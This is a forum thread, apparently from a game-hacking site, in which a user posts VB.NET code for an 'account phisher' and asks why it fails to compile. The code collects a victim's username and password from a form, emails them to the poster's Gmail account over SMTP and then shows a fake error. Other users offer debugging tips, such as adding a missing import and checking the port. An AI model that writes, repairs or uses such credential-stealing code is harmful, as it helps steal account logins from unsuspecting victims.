Results 1 to 5 of 5
  1. #1
    Beex's Avatar
    Join Date
    May 2008
    Gender
    male
    Location
    Posh Gang HQ
    Posts
    633
    Reputation
    55
    Thanks
    402
    My Mood
    Angelic

    [HELP!]Account phisher

    When i try to compile this it says structe not found help? im new as you can tell but i know i have the potential xD

    If TextBox1.Text = "" Then
    MsgBox("Username Is Missing")
    If Textbox2.text = "" Then
    Msgbox("Password Is Missing")
    Else
    End If
    End if
    Dim smtpServer As New SmtpClient()
    Dim mail As New MailMessage()
    smtpServer.Credentials = New Net.NetworkCredential("Your Gmail", "Your Gmail Password")
    'using gmail
    smtpServer.Port = 587
    smtpServer.Host = "smtp.gmail.com"
    smtpServer.EnableSsl = True
    mail = New MailMessage()
    mail.From = New MailAddress("Your Gmail")
    mail.To.Add("Your Gmail")
    mail.Subject = "Username: " & TextBox1.Text
    mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & textbox2.text
    smtpServer.Send(mail)
    MsgBox("Any Error You Want Here")

  2. #2
    Pixie's Avatar
    Join Date
    Apr 2009
    Gender
    male
    Location
    Pixie wird wieder steigen.
    Posts
    1,884
    Reputation
    22
    Thanks
    229
    My Mood
    Fine
    PM me your teamviewer Info, I will see if I can do anything

  3. #3
    guza44_44's Avatar
    Join Date
    Oct 2008
    Gender
    male
    Posts
    433
    Reputation
    16
    Thanks
    310
    this spot prob has the wrong place or port
    Code:
    smtpServer.Port = 587
    smtpServer.Host = "smtp.gmail.com"
    smtpServer.EnableSsl = True
    or you need to import something on top of your code that u didnt
    [IMG]https://i304.photobucke*****m/albums/nn168/guza44/sig-1.png[/IMG]

  4. #4
    Zoom's Avatar
    Join Date
    May 2009
    Gender
    male
    Location
    Your going on my 24/7 DDoS hit list.
    Posts
    8,552
    Reputation
    127
    Thanks
    5,970
    My Mood
    Happy
    Quote Originally Posted by guza44_44 View Post
    this spot prob has the wrong place or port
    Code:
    smtpServer.Port = 587
    smtpServer.Host = "smtp.gmail.com"
    smtpServer.EnableSsl = True
    or you need to import something on top of your code that u didnt
    You forgot import system.netmail i think!

  5. #5
    NextGen1's Avatar
    Join Date
    Dec 2009
    Gender
    male
    Location
    Not sure really.
    Posts
    6,312
    Reputation
    382
    Thanks
    3,019
    My Mood
    Amazed
    Just to point this out (again)

    You are behind an ISP that no longer allows SMTP traffic in the form of relay's
    Port 587 is now blocked , thats an example code thats a few years old.

    Even if you get it to run, it won't be functional.


     


     


     



    The Most complete application MPGH will ever offer - 68%




Similar Threads

  1. [Help Request] Need Help,account stolen
    By Saboteurs in forum CrossFire Help
    Replies: 4
    Last Post: 07-13-2011, 03:34 PM
  2. [Help Request] Crossfire Account Phisher
    By Slang in forum CrossFire Help
    Replies: 16
    Last Post: 05-25-2011, 06:58 PM
  3. [HELP] Account Creator
    By Nickyy in forum Programming Tutorial Requests
    Replies: 1
    Last Post: 03-08-2010, 03:45 PM
  4. help account related
    By hahahayea in forum Combat Arms Help
    Replies: 2
    Last Post: 11-24-2009, 11:45 PM
  5. Help Account
    By x9jake9x in forum WarRock Korea Hacks
    Replies: 1
    Last Post: 05-22-2007, 05:15 PM